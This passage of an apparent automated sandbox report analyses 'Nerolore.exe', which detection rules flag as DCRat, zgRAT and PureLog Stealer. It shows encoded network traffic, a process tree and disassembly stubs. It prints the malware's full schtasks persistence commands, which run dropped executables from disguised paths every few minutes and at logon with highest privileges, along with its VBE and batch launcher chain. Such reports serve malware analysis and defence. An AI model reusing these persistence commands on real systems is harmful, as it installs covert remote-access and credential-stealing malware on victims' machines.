                              Aug 25, 2024 15:45:13.913201094 CEST1236OUTData Raw: 5f 5d 5c 53 54 47 51 5b 5b 5f 5a 51 59 53 58 54 57 5c 5d 5e 57 51 53 55 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _]\STGQ[[_ZQYSXTW\]^WQSUYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-;6.<\#\).(X>>*<?"<7W3+9 73%]8&F$.Y/5
                              Aug 25, 2024 15:45:14.017232895 CEST1268OUTData Raw: 3f 59 3c 50 38 30 01 28 01 01 19 14 3b 0a 00 06 2c 07 03 45 35 3b 1d 1a 06 3e 5f 1d 04 1c 26 3a 3c 30 20 1f 3d 29 24 24 31 22 3f 2c 3a 08 0b 0e 31 40 2d 1b 31 05 28 19 08 20 21 3f 2b 31 02 06 31 59 0b 5f 39 3b 1c 2b 32 5b 20 13 3a 38 08 25 37 5a
                              Data Ascii: ?Y<P80(;,E5;>_&:<0 =)$$1"?,:1@-1( !?+11Y_9;+2[ :8%7Z*=>0>5U$3<#*%[<>6:6;9R+.$6:=,:Z4T1&7_4 90)4,4?6\_/:==+9!="&3E;&Y1YY+$&685?$=;2X9&<(^?>U, ,1#<5!:01/[? 1:
                              Aug 25, 2024 15:45:14.315907955 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:45:13 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:09:42:59
                              Start date:25/08/2024
                              Path:C:\Users\user\Desktop\Nerolore.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\Nerolore.exe"
                              Imagebase:0xf00000
                              File size:3'514'624 bytes
                              MD5 hash:173524B924DF7F85FC534A492707F643
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:2
                              Start time:09:43:00
                              Start date:25/08/2024
                              Path:C:\Windows\SysWOW64\wscript.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WScript.exe" "C:\FontHost\g5hurAAWnnmPcvivkFQfeK8OCkdYaf1Ra.vbe"
                              Imagebase:0xe60000
                              File size:147'456 bytes
                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              General

                              Target ID:3
                              Start time:09:43:13
                              Start date:25/08/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\FontHost\jaBrEDg4l5LU3rdwo0YF4dXFHSglnc1NMMTuA.bat" "
                              Imagebase:0x790000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:4
                              Start time:09:43:13
                              Start date:25/08/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:5
                              Start time:09:43:13
                              Start date:25/08/2024
                              Path:C:\FontHost\ContainerAgentWinSession.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\FontHost/ContainerAgentWinSession.exe"
                              Imagebase:0xa40000
                              File size:1'957'888 bytes
                              MD5 hash:03EF05FF3B0C058220324C2CE72950F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.2222651523.0000000000A42000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2282828928.0000000013347000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\FontHost\ContainerAgentWinSession.exe, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\FontHost\ContainerAgentWinSession.exe, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\FontHost\ContainerAgentWinSession.exe, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\FontHost\ContainerAgentWinSession.exe, Author: Joe Security
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 66%, ReversingLabs
                              • Detection: 55%, Virustotal, Browse
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:7
                              Start time:09:43:16
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe'" /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:8
                              Start time:09:43:16
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "NjWYKcLujkVoPzemFBeg" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:9
                              Start time:09:43:16
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 6 /tr "'C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:10
                              Start time:09:43:16
                              Start date:25/08/2024
                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.cmdline"
                              Imagebase:0x7ff746e70000
                              File size:2'759'232 bytes
                              MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              General

                              Target ID:11
                              Start time:09:43:16
                              Start date:25/08/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:12
                              Start time:09:43:16
                              Start date:25/08/2024
                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9C21.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC8B039BDD94094F1C8481C1D931E1DDC9.TMP"
                              Imagebase:0x7ff779cd0000
                              File size:52'744 bytes
                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              General

                              Target ID:13
                              Start time:09:43:17
                              Start date:25/08/2024
                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00lep0eq\00lep0eq.cmdline"
                              Imagebase:0x7ff746e70000
                              File size:2'759'232 bytes
                              MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              General

                              Target ID:14
                              Start time:09:43:17
                              Start date:25/08/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:15
                              Start time:09:43:17
                              Start date:25/08/2024
                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9E35.tmp" "c:\Windows\System32\CSCBE36F6BF318F4E92A088C79F57D3D17B.TMP"
                              Imagebase:0x7ff779cd0000
                              File size:52'744 bytes
                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              General

                              Target ID:16
                              Start time:09:43:17
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 11 /tr "'C:\FontHost\NjWYKcLujkVoPzemFBeg.exe'" /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:17
                              Start time:09:43:17
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "NjWYKcLujkVoPzemFBeg" /sc ONLOGON /tr "'C:\FontHost\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff6068e0000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:18
                              Start time:09:43:17
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 10 /tr "'C:\FontHost\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:19
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\dbg\conhost.exe'" /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:20
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\All Users\dbg\conhost.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:21
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\dbg\conhost.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:22
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Templates\OfficeClickToRun.exe'" /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:23
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\Default\Templates\OfficeClickToRun.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:24
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Templates\OfficeClickToRun.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:25
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\ProgramData\dbg\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Users\All Users\dbg\conhost.exe"
                              Imagebase:0xad0000
                              File size:1'957'888 bytes
                              MD5 hash:03EF05FF3B0C058220324C2CE72950F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\dbg\conhost.exe, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\dbg\conhost.exe, Author: Joe Security
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 66%, ReversingLabs
                              • Detection: 55%, Virustotal, Browse
                              Has exited:true

                              General

                              Target ID:26
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe'" /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:27
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\ProgramData\dbg\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Users\All Users\dbg\conhost.exe"
                              Imagebase:0x380000
                              File size:1'957'888 bytes
                              MD5 hash:03EF05FF3B0C058220324C2CE72950F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:28
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "NjWYKcLujkVoPzemFBeg" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:29
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Wow64 process (32bit):false
                              Commandline:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Imagebase:0x50000
                              File size:1'957'888 bytes
                              MD5 hash:03EF05FF3B0C058220324C2CE72950F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001D.00000002.3350660394.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001D.00000002.3350660394.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe, Author: Joe Security
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Avira
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 66%, ReversingLabs
                              • Detection: 55%, Virustotal, Browse
                              Has exited:false

                              General

                              Target ID:30
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:31
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe"
                              Imagebase:0x50000
                              File size:1'957'888 bytes
                              MD5 hash:03EF05FF3B0C058220324C2CE72950F2
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 66%, ReversingLabs
                              • Detection: 55%, Virustotal, Browse
                              Has exited:true

                              General

                              Target ID:32
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "ContainerAgentWinSessionC" /sc MINUTE /mo 5 /tr "'C:\FontHost\ContainerAgentWinSession.exe'" /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:33
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "ContainerAgentWinSession" /sc ONLOGON /tr "'C:\FontHost\ContainerAgentWinSession.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:35
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "ContainerAgentWinSessionC" /sc MINUTE /mo 9 /tr "'C:\FontHost\ContainerAgentWinSession.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:37
                              Start time:09:43:19
                              Start date:25/08/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aQ1wx53V7n.bat"
                              Imagebase:0x7ff69f830000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:38
                              Start time:09:43:19
                              Start date:25/08/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:39
                              Start time:09:43:19
                              Start date:25/08/2024
                              Path:C:\Windows\System32\chcp.com
                              Wow64 process (32bit):false
                              Commandline:chcp 65001
                              Imagebase:0x7ff6b1fd0000
                              File size:14'848 bytes
                              MD5 hash:33395C4732A49065EA72590B14B64F32
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:40
                              Start time:09:43:19
                              Start date:25/08/2024
                              Path:C:\Windows\System32\w32tm.exe
                              Wow64 process (32bit):false
                              Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Imagebase:0x7ff7088a0000
                              File size:108'032 bytes
                              MD5 hash:81A82132737224D324A3E8DA993E2FB5
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:41
                              Start time:09:43:21
                              Start date:25/08/2024
                              Path:C:\FontHost\ContainerAgentWinSession.exe
                              Wow64 process (32bit):false
                              Commandline:C:\FontHost\ContainerAgentWinSession.exe
                              Imagebase:0xd60000
                              File size:1'957'888 bytes
                              MD5 hash:03EF05FF3B0C058220324C2CE72950F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:42
                              Start time:09:43:21
                              Start date:25/08/2024
                              Path:C:\FontHost\ContainerAgentWinSession.exe
                              Wow64 process (32bit):false
                              Commandline:C:\FontHost\ContainerAgentWinSession.exe
                              Imagebase:0x30000
                              File size:1'957'888 bytes
                              MD5 hash:03EF05FF3B0C058220324C2CE72950F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:43
                              Start time:09:43:24
                              Start date:25/08/2024
                              Path:C:\ProgramData\dbg\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Users\All Users\dbg\conhost.exe"
                              Imagebase:0xb00000
                              File size:1'957'888 bytes
                              MD5 hash:03EF05FF3B0C058220324C2CE72950F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:44
                              Start time:09:43:27
                              Start date:25/08/2024
                              Path:C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe"
                              Imagebase:0x110000
                              File size:1'957'888 bytes
                              MD5 hash:03EF05FF3B0C058220324C2CE72950F2
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:2%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:20%
                                Total number of Nodes:5
                                Total number of Limit Nodes:0

                                Executed Functions

                                Function 04946856 Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 4946856-494689d NtQueryInformationProcess GetSystemInfo
                                APIs
                                • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 0494686C
                                • GetSystemInfo.KERNELBASE(?), ref: 0494687E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2095127165.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4940000_Nerolore.jbxd
                                Similarity
                                • API ID: InfoInformationProcessQuerySystem
                                • String ID:
                                • API String ID: 1993426926-0
                                • Opcode ID: a69bf323aaec94cf604142f0b494539be9251d29c73c87e026f5d02f21e16e2b
                                • Instruction ID: 68ff591a4317c834ad9e2b3a2448c88c4b249cc5dcb88fb67abd42ba8455beb8
                                • Opcode Fuzzy Hash: a69bf323aaec94cf604142f0b494539be9251d29c73c87e026f5d02f21e16e2b
                                • Instruction Fuzzy Hash: 80F0F876600119ABCB159F99DC49EDF7FA9EB49391B018029F916D7250CB30A911CBE0
                                Function 049466F5 Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 60 49466f5-4946708 RtlExitUserProcess 61 4946715-49467ee 60->61
                                APIs
                                • RtlExitUserProcess.NTDLL(?,77E8F3B0,000000FF), ref: 04946702
                                Memory Dump Source
                                • Source File: 00000000.00000002.2095127165.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4940000_Nerolore.jbxd
                                Similarity
                                • API ID: ExitProcessUser
                                • String ID:
                                • API String ID: 3902816426-0
                                • Opcode ID: 0d2f7d00e3f36c60914e8fbf2ec66c8110738c5900d084a5f7921b6d8c3b8b46
                                • Instruction ID: 0322a696be2da458ac43187bbf25682c2e1be6654d90d3730e040268e8a4c6c1
                                • Opcode Fuzzy Hash: 0d2f7d00e3f36c60914e8fbf2ec66c8110738c5900d084a5f7921b6d8c3b8b46
